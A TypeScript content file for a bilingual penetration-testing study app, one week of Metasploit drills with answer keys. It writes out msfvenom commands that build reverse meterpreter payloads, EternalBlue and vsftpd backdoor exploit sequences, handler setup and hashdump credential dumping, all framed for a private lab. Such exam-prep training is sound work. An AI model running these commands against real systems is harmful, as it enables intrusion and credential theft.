import { StudyWeek } from "@/lib/types";
import {
  MSF_HANDLER_WORKSHOP,
  MSF_LHOST_WORKSHOP,
  MSF_OPTIONS_WORKSHOP,
  MSF_POST_WORKSHOP,
  MSF_SEARCH_WORKSHOP,
  MSF_TROUBLESHOOTING,
} from "@/content/workshops/metasploit-fundamentals";

/**
 * MES 1 / SEMANA 3 — Flujo msfconsole (hueco #1). LHOST = vboxnet0.
 * No es un catálogo de 0-days: search → use → show options → set → (sesión) → sysinfo.
 */
export const month1Week3: StudyWeek = {
  id: "m1-w3",
  monthId: "m1",
  title: "Semana 3 — Metasploit Framework de memoria",
  goal: "Flujo firme: search → use → show options → set (RHOSTS / LHOST vboxnet0) → exploit → sysinfo. Handler y msfvenom con el mismo triplete.",
  detailed: true,
  blocks: [
    {
      id: "m1-w3-b1",
      weekId: "m1-w3",
      order: 1,
      title: "msfconsole: search y use",
      titleEn: "msfconsole: search and use",
      objective: "search acotado + use por ruta. Confirmas el prompt. No lanzas exploit hoy.",
      objectiveEn: "Narrow search, then use by full path. Confirm the prompt. Do not run exploit yet.",
      durationMin: 45,
      type: "practice",
      theoryEs:
        "Módulos: exploit, auxiliary, post, payload. search lista; use selecciona. 'search ftp' es ruido. Solo tu lab. Hoy NO teclees exploit.",
      theoryEn:
        "search finds; use selects. Filter with type: and platform:. Exploit comes after show options (next block).",
      examPhrases: ["search", "use", "exploit module", "auxiliary module"],
      practiceSteps: [
        "msfconsole  — espera el prompt msf6 >",
        "search vsftpd  — anota UNA ruta. No use 0 si hay duda.",
        "search type:exploit platform:linux samba  — mira cómo se acorta.",
        "use exploit/unix/ftp/vsftpd_234_backdoor  — el prompt debe cambiar. STOP. No exploit.",
        "Di: diferencia search vs use. Recall. back si quieres salir del módulo.",
      ],
      workshop: MSF_SEARCH_WORKSHOP,
      troubleshooting: MSF_TROUBLESHOOTING.filter((t) => ["wrong-search"].includes(t.id)),
      subtopics: ["msf-search-use"],
      drills: [
        {
          id: "d1",
          promptEs: "Dentro de msfconsole: busca módulos 'eternalblue'.",
          promptEn: "In msfconsole: search modules for eternalblue.",
          answer: "search eternalblue",
          subtopicId: "msf-search-use",
          explanation: "search no lanza nada. use viene después.",
          howToEs: "search y el término.",
          conceptQuestion: "¿search explota el host?",
          conceptAnswer: "no",
        },
        {
          id: "d2",
          promptEs: "Selecciona exploit/windows/smb/ms17_010_eternalblue.",
          promptEn: "Select exploit/windows/smb/ms17_010_eternalblue.",
          answer: "use exploit/windows/smb/ms17_010_eternalblue",
          subtopicId: "msf-search-use",
          explanation: "use + ruta. No lo corras contra tu casa; es un drill de sintaxis.",
          howToEs: "use y la ruta completa.",
        },
        {
          id: "d3",
          promptEs: "Busca SOLO exploits linux relacionados a samba.",
          promptEn: "Search ONLY linux exploits related to samba.",
          answer: "search type:exploit platform:linux samba",
          subtopicId: "msf-search-use",
          explanation: "Filtros type: y platform:. No es nmap.",
          howToEs: "search type:exploit platform:linux samba",
        },
      ],
      comparisonTable: {
        caption: "Comando → qué hace",
        headers: ["Comando", "Hace", "No hace"],
        rows: [
          ["search …", "lista módulos", "no toca la víctima"],
          ["use ruta", "módulo activo (prompt)", "no configura IPs"],
          ["exploit", "intenta el módulo (bloque 2+)", "no sustituye show options"],
        ],
      },
      glossary: [
        { en: "module", es: "módulo" },
        { en: "exploit module", es: "módulo de explotación" },
        { en: "auxiliary module", es: "módulo auxiliar" },
        { en: "payload", es: "carga útil" },
      ],
      resources: [
        { label: "TryHackMe — Metasploit: Introduction", url: "https://tryhackme.com/room/metasploitintro", platform: "TryHackMe" },
      ],
      closingChecklist: [
        "search y use por ruta de memoria",
        "Sé filtrar type: y platform:",
        "No lancé exploit sin show options",
      ],
    },
    {
      id: "m1-w3-b2",
      weekId: "m1-w3",
      order: 2,
      title: "show options y set",
      titleEn: "show options and set",
      objective: "Hábito: show options → rellenar Required → show options otra vez. RHOSTS = TARGET_MS2.",
      objectiveEn: "Habit: show options, fill Required, show options again. RHOSTS = TARGET_MS2.",
      durationMin: 45,
      type: "practice",
      theoryEs:
        "Required yes vacío es el fallo #1. set RHOSTS / set RPORT. LHOST es el siguiente bloque si el payload es reverse.",
      theoryEn:
        "Always show options before exploit. RHOSTS is the guest, not Kali.",
      examPhrases: ["show options", "required option", "set RHOSTS"],
      practiceSteps: [
        "use un módulo de práctica (el vsftpd del bloque 1). show options",
        "Marca Required yes vacíos. set RHOSTS $(grep TARGET_MS2 ~/ejpt-lab.txt | cut -d= -f2)",
        "set RPORT si aplica (21 en FTP). No copies LPORT aquí.",
        "show options otra vez. Si algo Required sigue vacío, no exploit.",
        "Recall.",
      ],
      workshop: MSF_OPTIONS_WORKSHOP,
      troubleshooting: MSF_TROUBLESHOOTING.filter((t) => ["skip-options"].includes(t.id)),
      subtopics: ["msf-options"],
      drills: [
        {
          id: "d1",
          promptEs: "Ver todas las opciones del módulo activo.",
          promptEn: "List all options of the active module.",
          answer: "show options",
          subtopicId: "msf-options",
          explanation: "No es show payloads. Aquí ves Required.",
          howToEs: "show options",
        },
        {
          id: "d2",
          promptEs: "Target 10.10.10.90 como RHOSTS.",
          promptEn: "Set target 10.10.10.90 as RHOSTS.",
          answer: "set RHOSTS 10.10.10.90",
          subtopicId: "msf-options",
          explanation: "RHOSTS es la víctima, no tu IP.",
          howToEs: "set RHOSTS y la IP.",
          conceptQuestion: "¿RHOSTS es Kali o la víctima?",
          conceptAnswer: "victima",
        },
        {
          id: "d3",
          promptEs: "Puerto remoto RPORT 8080.",
          promptEn: "Set remote port RPORT to 8080.",
          answer: "set RPORT 8080",
          subtopicId: "msf-options",
          explanation: "RPORT = servicio en la víctima. LPORT es el tuyo.",
          howToEs: "set RPORT 8080",
        },
      ],
      glossary: [
        { en: "required option", es: "opción requerida" },
        { en: "current setting", es: "valor actual" },
        { en: "target", es: "objetivo" },
      ],
      resources: [
        { label: "TryHackMe — Metasploit: Introduction", url: "https://tryhackme.com/room/metasploitintro", platform: "TryHackMe" },
      ],
      closingChecklist: [
        "show options SIEMPRE antes de exploit",
        "set RHOSTS y set RPORT de memoria",
        "Detecto Required yes vacío",
      ],
    },
    {
      id: "m1-w3-b3",
      weekId: "m1-w3",
      order: 3,
      title: "PUNTO CRÍTICO: LHOST/LPORT/RHOSTS + msfvenom",
      titleEn: "Critical: LHOST/LPORT/RHOSTS + msfvenom",
      objective: "LHOST = vboxnet0, RHOSTS = guest. msfvenom con el mismo LHOST/LPORT. No wlan0 ni 127.0.0.1.",
      objectiveEn: "LHOST = vboxnet0, RHOSTS = guest. msfvenom uses the same pair. Not wlan0 or 127.0.0.1.",
      durationMin: 50,
      type: "drill",
      theoryEs:
        "Reverse: la víctima llama a TÚ vboxnet0:LPORT. Bind: tú llamas a RHOSTS. Mezclar LHOST con la IP del guest = la shell no vuelve.",
      theoryEn:
        "RHOSTS = victim. LHOST = you on vboxnet0. LPORT = your listen port. Reverse vs bind: show options.",
      examPhrases: ["LHOST", "LPORT", "RHOSTS", "reverse shell", "bind shell"],
      practiceSteps: [
        "ip addr show vboxnet0 — anota LHOST (inet). No uses wlan0.",
        "En un módulo reverse (si show options pide LHOST): set RHOSTS <TARGET_MS2> ; set LHOST <vboxnet0> ; set LPORT 4444",
        "show options. LHOST y RHOSTS distintas, mismo /24.",
        "msfvenom: genera ELF con ESE LHOST y 4444. No lo copies a internet.",
        "Opcional: el mismo comando en formato exe (sintaxis). No lo ejecutes en tu Windows de casa.",
        "Recall LHOST vs RHOSTS.",
      ],
      workshop: MSF_LHOST_WORKSHOP,
      troubleshooting: MSF_TROUBLESHOOTING.filter((t) => ["lhost-wlan", "bind-vs-reverse"].includes(t.id)),
      subtopics: ["msf-lhost-lport", "msfvenom"],
      drills: [
        {
          id: "d1",
          promptEs: "Víctima 192.168.56.101, Kali Host-Only 192.168.56.1. set RHOSTS y set LHOST (dos líneas mentales).",
          promptEn: "Victim 192.168.56.101, Kali host-only 192.168.56.1. set RHOSTS and set LHOST.",
          answer: "set RHOSTS 192.168.56.101 set LHOST 192.168.56.1",
          answerKeywords: ["rhosts", "192.168.56.101", "lhost", "192.168.56.1"],
          subtopicId: "msf-lhost-lport",
          explanation: "RHOSTS guest. LHOST vboxnet0. Nunca al revés.",
          howToEs: "Deben aparecer ambas IPs con RHOSTS y LHOST.",
          conceptQuestion: "¿LHOST es la víctima?",
          conceptAnswer: "no",
        },
        {
          id: "d2",
          promptEs: "msfvenom ELF meterpreter reverse_tcp LHOST=192.168.56.1 LPORT=4444 -o shell.elf",
          promptEn: "msfvenom ELF meterpreter reverse_tcp LHOST=192.168.56.1 LPORT=4444 -o shell.elf",
          answer: "msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f elf -o shell.elf",
          subtopicId: "msfvenom",
          explanation: "LHOST es TU IP de lab, no la del guest. -f elf -o archivo.",
          howToEs: "-p linux/x86/meterpreter/reverse_tcp, LHOST, LPORT, -f elf -o shell.elf",
        },
        {
          id: "d3",
          promptEs: "msfvenom exe Windows meterpreter reverse_tcp mismo LHOST/LPORT -o shell.exe (solo sintaxis).",
          promptEn: "msfvenom Windows exe reverse_tcp same LHOST/LPORT -o shell.exe (syntax only).",
          answer: "msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe -o shell.exe",
          subtopicId: "msfvenom",
          explanation: "Mismo LHOST de lab. No es para tu PC personal.",
          howToEs: "-p windows/meterpreter/reverse_tcp -f exe -o shell.exe",
        },
      ],
      comparisonTable: {
        caption: "RHOSTS vs LHOST vs LPORT",
        headers: ["Variable", "Quién", "En TU lab"],
        rows: [
          ["RHOSTS", "víctima", "TARGET_MS2"],
          ["LHOST", "atacante (reverse vuelve aquí)", "inet vboxnet0"],
          ["LPORT", "puerto en Kali", "4444 típico"],
          ["wlan0 / 127.0.0.1", "Internet host / localhost", "NO LHOST de MS2"],
        ],
      },
      glossary: [
        { en: "reverse shell", es: "la víctima se conecta a ti" },
        { en: "bind shell", es: "tú te conectas a un puerto de la víctima" },
        { en: "standalone payload", es: "fichero generado (msfvenom)" },
      ],
      closingChecklist: [
        "Explico RHOSTS vs LHOST con vboxnet0",
        "No puse la IP del guest en LHOST",
        "msfvenom ELF generado (el exe es sintaxis; no en PCs ajenos)",
      ],
    },
    {
      id: "m1-w3-b4",
      weekId: "m1-w3",
      order: 4,
      title: "multi/handler: el listener",
      titleEn: "multi/handler listener",
      objective: "Handler con el MISMO payload/LHOST/LPORT que msfvenom. LHOST sigue siendo vboxnet0.",
      objectiveEn: "Handler matches msfvenom payload/LHOST/LPORT. LHOST is still vboxnet0.",
      durationMin: 45,
      type: "practice",
      theoryEs:
        "Payload fuera de un módulo exploit → listener aparte. El triplete debe coincidir o no hay sesión.",
      theoryEn:
        "multi/handler waits for reverse. Same -p, LHOST, LPORT as msfvenom. Only your guest.",
      examPhrases: ["multi/handler", "listener", "exploit -j"],
      practiceSteps: [
        "use exploit/multi/handler",
        "set payload linux/x86/meterpreter/reverse_tcp  (el mismo -p del ELF)",
        "set LHOST <inet vboxnet0> ; set LPORT 4444",
        "show options — triplete idéntico al msfvenom",
        "exploit -j -z  — anota el job. No hace falta ejecutar el ELF en este recall si no quieres; el hábito es el match.",
        "Recall.",
      ],
      workshop: MSF_HANDLER_WORKSHOP,
      troubleshooting: MSF_TROUBLESHOOTING.filter((t) => ["handler-mismatch", "lhost-wlan"].includes(t.id)),
      subtopics: ["msf-multihandler"],
      drills: [
        {
          id: "d1",
          promptEs: "Selecciona el listener multi/handler.",
          promptEn: "Select the multi/handler listener.",
          answer: "use exploit/multi/handler",
          subtopicId: "msf-multihandler",
          explanation: "Es un módulo exploit que solo ESCUCHA. Luego set payload.",
          howToEs: "use exploit/multi/handler",
        },
        {
          id: "d2",
          promptEs: "Payload del listener: windows/meterpreter/reverse_tcp",
          promptEn: "Set listener payload to windows/meterpreter/reverse_tcp",
          answer: "set payload windows/meterpreter/reverse_tcp",
          subtopicId: "msf-multihandler",
          explanation: "Debe igualar el -p de msfvenom. No inventes otro.",
          howToEs: "set payload y el nombre.",
        },
        {
          id: "d3",
          promptEs: "Listener en background sin abrir sesión al instante.",
          promptEn: "Run listener in background without opening a session immediately.",
          answer: "exploit -j -z",
          subtopicId: "msf-multihandler",
          explanation: "-j job, -z no interactúes aún. run a secas bloquea.",
          howToEs: "exploit -j -z",
        },
      ],
      glossary: [
        { en: "listener", es: "escucha" },
        { en: "background job", es: "job en segundo plano" },
        { en: "session", es: "sesión" },
      ],
      resources: [
        { label: "TryHackMe — Metasploit: Introduction (handler)", url: "https://tryhackme.com/room/metasploitintro", platform: "TryHackMe" },
      ],
      closingChecklist: [
        "Sé cuándo hace falta handler (payload fuera del módulo)",
        "Triplete payload/LHOST/LPORT coincide con msfvenom",
      ],
    },
    {
      id: "m1-w3-b5",
      weekId: "m1-w3",
      order: 5,
      title: "Post: sysinfo, getuid, hashdump",
      titleEn: "Post: sysinfo, getuid, hashdump",
      objective: "meterpreter: sysinfo y getuid. hashdump = Windows SAM; en MS2 documentas que no aplica.",
      objectiveEn: "meterpreter: sysinfo and getuid. hashdump is Windows SAM; on MS2 you write that it does not apply.",
      durationMin: 45,
      type: "practice",
      theoryEs:
        "Sesión abierta → prompt meterpreter. sysinfo / getuid son el mínimo eJPT. hashdump no es Linux shadow.",
      theoryEn:
        "sysinfo = OS/arch/host. getuid = who you are. hashdump = Windows SAM, needs privileges. MS2 is Linux.",
      examPhrases: ["meterpreter", "sysinfo", "getuid", "hashdump"],
      practiceSteps: [
        "Si tienes sesión: sysinfo ; getuid. Si no, escribe los dos de memoria y el taller.",
        "ps — opcional. No es hashdump.",
        "Di en voz alta: por qué hashdump falla o no existe en Linux MS2.",
        "Windows (solo VM legal): hashdump tras privilegios. getsystem es OPTIONAL/Windows, no MS2.",
        "Recall.",
      ],
      workshop: MSF_POST_WORKSHOP,
      troubleshooting: MSF_TROUBLESHOOTING.filter((t) => ["hashdump-linux"].includes(t.id)),
      subtopics: ["msf-sysinfo", "msf-hashdump"],
      drills: [
        {
          id: "d1",
          promptEs: "meterpreter: SO, arquitectura, hostname.",
          promptEn: "meterpreter: OS, arch, hostname.",
          answer: "sysinfo",
          subtopicId: "msf-sysinfo",
          explanation: "No es getuid. sysinfo = máquina.",
          howToEs: "sysinfo",
        },
        {
          id: "d2",
          promptEs: "meterpreter: ¿con qué usuario corres?",
          promptEn: "meterpreter: which user are you?",
          answer: "getuid",
          subtopicId: "msf-sysinfo",
          explanation: "Identidad de la sesión, no hashes.",
          howToEs: "getuid",
        },
        {
          id: "d3",
          promptEs: "meterpreter Windows: extraer hashes SAM (si hay privilegios).",
          promptEn: "Windows meterpreter: dump SAM hashes (if privileged).",
          answer: "hashdump",
          subtopicId: "msf-hashdump",
          explanation: "SAM/Windows. En MS2 Linux no es el comando del día.",
          howToEs: "hashdump",
          conceptQuestion: "¿hashdump lee /etc/shadow en Linux?",
          conceptAnswer: "no",
        },
      ],
      glossary: [
        { en: "meterpreter", es: "payload avanzado / sesión" },
        { en: "privilege escalation", es: "escalada (otro tema; Windows getsystem)" },
        { en: "SAM database", es: "hashes Windows, no Linux" },
      ],
      resources: [
        { label: "TryHackMe — Metasploit: Introduction", url: "https://tryhackme.com/room/metasploitintro", platform: "TryHackMe" },
      ],
      closingChecklist: [
        "sysinfo y getuid de memoria",
        "En MS2: documenté por qué hashdump SAM no aplica",
      ],
    },
    {
      id: "m1-w3-b6",
      weekId: "m1-w3",
      order: 6,
      title: "Drill de flujo completo (sintaxis)",
      titleEn: "Full-flow syntax drill",
      objective: "Escribir el orden search → use → show options → set → exploit. IPs de ejemplo = examen, no tu LAN.",
      objectiveEn: "Write the order search → use → show options → set → exploit. Example IPs are exam-style, not your home LAN.",
      durationMin: 45,
      type: "drill",
      theoryEs:
        "Sin teoría nueva. Fijación del ORDEN. No lances EternalBlue contra nada que no sea una VM Windows tuya y legal.",
      theoryEn:
        "Order only. Do not run EternalBlue on networks you do not own.",
      examPhrases: ["exploit", "set LHOST", "set RHOSTS"],
      practiceSteps: [
        "En papel: secuencia A (eternalblue, IPs de ejemplo del drill). No la ejecutes en wlan0.",
        "Secuencia B (vsftpd): en TU MS2 puedes seguir el skill-check del bloque 7; aquí es memoria.",
        "Tercera pasada A sin apuntes.",
      ],
      workshop: MSF_SEARCH_WORKSHOP.slice(0, 2),
      troubleshooting: MSF_TROUBLESHOOTING.filter((t) => ["skip-options", "lhost-wlan"].includes(t.id)),
      subtopics: ["msf-search-use", "msf-options", "msf-lhost-lport", "msf-sysinfo", "msf-hashdump", "msf-multihandler"],
      drills: [
        {
          id: "d1",
          promptEs: "Orden (palabras clave): search eternalblue, use ms17_010, show options, RHOSTS 10.10.10.200, LHOST 10.8.0.15, LPORT 4444, exploit. IPs de ejemplo, no tu casa.",
          promptEn: "Keyword order: search eternalblue, use ms17_010, show options, those IPs, exploit. Example IPs, not your LAN.",
          answer:
            "search eternalblue use exploit/windows/smb/ms17_010_eternalblue show options set RHOSTS 10.10.10.200 set LHOST 10.8.0.15 set LPORT 4444 exploit",
          answerKeywords: ["search", "eternalblue", "use", "ms17_010", "show options", "rhosts", "10.10.10.200", "lhost", "10.8.0.15", "4444", "exploit"],
          subtopicId: "msf-search-use",
          explanation: "Orden: buscar, elegir, opciones, IPs, lanzar. LHOST es el atacante del ejemplo (VPN examen), en TU lab sería vboxnet0.",
          howToEs: "Deben salir search, use, show options, ambas IPs, exploit.",
        },
        {
          id: "d2",
          promptEs: "Orden vsftpd: search, use vsftpd_234_backdoor, show options, RHOSTS 10.10.10.201, exploit, sysinfo, getuid.",
          promptEn: "vsftpd order: search, use backdoor module, show options, RHOSTS, exploit, sysinfo, getuid.",
          answer:
            "search vsftpd use exploit/unix/ftp/vsftpd_234_backdoor show options set RHOSTS 10.10.10.201 exploit sysinfo getuid",
          answerKeywords: ["search", "vsftpd", "use", "vsftpd_234", "show options", "rhosts", "10.10.10.201", "exploit", "sysinfo", "getuid"],
          subtopicId: "msf-search-use",
          explanation: "Este módulo suele ser bind: LHOST a menudo no entra. sysinfo/getuid son post, en meterpreter/shell.",
          howToEs: "search vsftpd, use …backdoor, show options, RHOSTS, exploit, sysinfo, getuid.",
        },
      ],
      closingChecklist: [
        "El orden no se me olvida (search no va después de exploit)",
        "Sé que en lab real LHOST = vboxnet0, no 10.8.0.15 salvo VPN de examen",
      ],
    },
    {
      id: "m1-w3-b7",
      weekId: "m1-w3",
      order: 7,
      title: "Skill-check Semana 3 + lab MS2",
      titleEn: "Week 3 skill-check + MS2 lab",
      objective: "Skill-check 70%+. En TU MS2: flujo search/use/show options/set RHOSTS. Anota si el módulo es bind (LHOST N/A).",
      objectiveEn: "Skill-check 70%+. On YOUR MS2: search/use/show options/set RHOSTS. Note if the module is bind (LHOST N/A).",
      durationMin: 50,
      type: "checkpoint",
      theoryEs:
        "Solo Metasploitable 2 Host-Only. show options manda. EternalBlue no es este lab (no hay Windows). Documenta comandos; no improvises otro CVE.",
      theoryEn:
        "Only your MS2 guest. Follow show options. EternalBlue is not this Linux VM.",
      examPhrases: ["vsftpd", "RHOSTS", "bind shell"],
      practiceSteps: [
        "Skill-check app: Simulacros > Semana 3",
        "msfconsole → search vsftpd → use exploit/unix/ftp/vsftpd_234_backdoor → show options → set RHOSTS <TARGET_MS2>",
        "Lee si LHOST es Required. Si es bind, anota por qué no pones wlan0. Luego exploit solo contra ESE guest.",
        "Si hay sesión: sysinfo o whoami. Documenta el orden. hashdump: N/A Linux.",
      ],
      workshop: MSF_LHOST_WORKSHOP.slice(0, 1),
      troubleshooting: MSF_TROUBLESHOOTING.filter((t) =>
        ["skip-options", "lhost-wlan", "bind-vs-reverse", "hashdump-linux"].includes(t.id)
      ),
      closingChecklist: [
        "Skill-check Semana 3 ≥ 70%",
        "Documenté search/use/show options/set contra MS2",
        "LHOST/RHOSTS: ya no los intercambio en reverse; en bind sé decirlo",
      ],
      subtopics: ["msf-search-use", "msf-options", "msf-lhost-lport", "msf-sysinfo", "msf-hashdump", "msf-multihandler", "msfvenom"],
      resources: [
        { label: "Metasploitable 2 — guía de servicios (contexto)", url: "https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/", platform: "Docs" },
      ],
    },
  ],
};
